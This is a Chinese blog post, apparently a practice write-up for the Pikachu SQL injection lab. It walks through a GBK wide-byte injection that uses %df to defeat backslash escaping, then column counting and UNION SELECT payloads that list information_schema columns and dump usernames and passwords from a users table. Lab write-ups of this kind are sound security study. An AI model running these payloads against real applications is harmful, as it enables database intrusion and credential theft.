宽字节注入

已于 2024-04-12 18:08:14 修改
阅读量226 收藏 3
点赞数 8
分类专栏: SQL注入练习 文章标签: 数据库
于 2024-04-12 17:59:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83237906/article/details/137689429
版权

删去27,那是前端对‘%’进行url编码得来的;

还是不行,因为0 and 0当然就假了,

想起来要用or了:正常回显欧了,接下来和联合注入一样了

看这个

ORDER BY

查看左边列数多少

1🆗

2🆗

3不🆗

两位确定,

注库名

pikchua

注表名

注(user)表里的字段

kobe%df' or 1=1 union all select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1#

注值

kobe%df' or 1=1 union all select 1,(select group_concat(username,password) from users)#

总结:

只要网站的开发人员,使用到的转义函数添加的过滤字符经过url编码以后,能够被转化成2位16进制的编码,就可以利用宽字节注入实现一个攻击;

坚强的绿豆饼
关注
专栏目录
sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 894
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
宽字节注入原理分析
热门推荐
1stPeak's Blog
06-07 1万+
什么是宽字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是宽字节注入? 原理: 宽字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
sql注入之宽字节注入
m0_52484587的博客
07-11 760
str:需要添加反斜线的字符串。
4.网络编程
最新发布
weixin_45476535的博客
09-14 210
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
TiDB 数据库核心原理与架构_Lesson 01 TiDB 数据库架构概述课程整理
TiDB 社区干货传送门
09-12 1066
作者: 尚雷5580 原文来源: https://tidb.net/blog/beeb9eaf ...
Oracle EBS中AR模块的财务流程概览
qq_36620997的博客
09-14 540
AR模块的财务流程概览
Oracle 12c 及以上版本补丁更新说明及下载方法
zd1320732的专栏
09-10 311
参考下面的文章,会对补丁更新的流程有一定的了解。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 519
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
linux环境下手动安装mysql
weixin_45583482的博客
09-14 646
没想到兜兜转转这么些年,今天申请个云服务器用来搭建求生2服务器,先用mysql来测试,结果还是花了相当久的时间。基本所有单节点部署应用到linux环境,都三个流程:1 下载安装包2 解压修改配置文件3 运行启动脚本我们按这个流程来说我遇到并解决的问题 ,如果你在过程中遇到什么问题,也请先暂停你的启动流程,移步到最下面的内容,看看是否有和你遇到一样的问题,解决以后继续。
关于新版本 tidb dashboard API 调用说明
TiDB 社区干货传送门
09-11 248
作者: WalterWj 原文来源: https://tidb.net/blog/d2d669b2 ...
[快速入门] 使用 MybatisPlus 简化 CRUD 操作
CSDN@YuanDaiMa2048的博客
09-09 489
在这个文章中,将介绍如何使用 MybatisPlus 来简化常见的 CRUD(增删改查)操作。MybatisPlus 是 MyBatis 的增强工具,提供了许多便利的功能,让我们能够更轻松地与数据库交互。下面将一步步介绍如何使用 MybatisPlus 完成基本的增删改查操作。
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
不会编程的猫星人
09-14 667
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
mycat双主高可用架构部署-水评分表-范围分片配置
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
09-11 1263
mycat双主高可用架构部署-水评分表-范围分片配置
OpenJDK 8 安装指南
专注于全栈开发领域
09-12 1199
在分布式系统中,Apache Kafka 是一个非常受欢迎的消息中间件。它提供了高吞吐量、低延迟的消息传递机制,非常适合处理实时数据流。本文将介绍如何在 Java 中使用 Kafka Producer 并实现单例模式,以确保资源的有效管理。Kafka 是一个分布式流处理平台,它的核心功能包括发布和订阅记录流、存储流记录、以及处理流记录。为了充分利用 Kafka 的功能,一个高效的 Kafka 生产者(Producer)是必要的。
远程访问mysql
jiedianxiaobao的博客
09-14 333
mysql远程访问是一种性能很优秀的远程访问程序,能够为客户提供良好的远程访问服务,但用户想要通过mysql使用远程访问有两个不可缺少的条件,一个是能从外部访问到mysql开启的端口,另一个是使用者必须要有用户访问权限,两者齐备才能使用mysql远程访问。作为一款专为远程访问设计的软件,拥有强度的远程访问服务功能,能够轻松完成远程访问,而且能满足用户对远程访问的隐私保护的要求,除此之外,节点小宝为了能让用户无障碍的使用远程访问服务,简单易用,即使是新手用户使用起来也没有一点压力。现在极其发达的互联网时代,
MySQL 数据库:原理、应用与发展
大厂全栈码农
09-10 2184
接着详细阐述了其安装与配置过程,涵盖在不同操作系统上的安装方式、配置文件参数的含义与设置,以及字符集和校对规则的设定。对于 MySQL 存储引擎,重点分析了 InnoDB 和 MyISAM 存储引擎的特性,包括事务支持、外键约束、数据存储结构以及适用场景等,同时也提及了其他存储引擎。除了 InnoDB 和 MyISAM 之外,MySQL 还支持其他存储引擎,如 Memory 存储引擎(数据存储在内存中,适合临时数据存储和高速缓存)、Archive 存储引擎(用于存储大量的归档数据,具有高压缩比)等。
模拟面试后端开发复盘
Java小白的博客 致力分享每一天学到的知识
09-11 1011
一般来说系统的开发和设计思路的话,就是一般现在的项目基本上都是前后端分离架构来实现的,所以在项目的设计时,要分层次结构来划定。前后端分离架构中,前端一般是有专业的前端工程师来写的,因此我们步需要过分的关注前端,可以在github上找到相关的前端项目即可。
服装|基于Java+vue的服装定制系统(源码+数据库+文档)
weixin_66413741的博客
09-10 669
服装定制将是广大用户们不可忽视的一块。但是管理好服装定制又面临很多麻烦需要解决,我们可以发现服装定制方面的系统并不是相当普及,在服装定制方面的可以有许多改进。即服装定制系统慢慢的被人们关注。服装定制管理方面的任务繁琐,以至于每年都在服装定制管理这方面投入较多的精力却效果甚微,
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值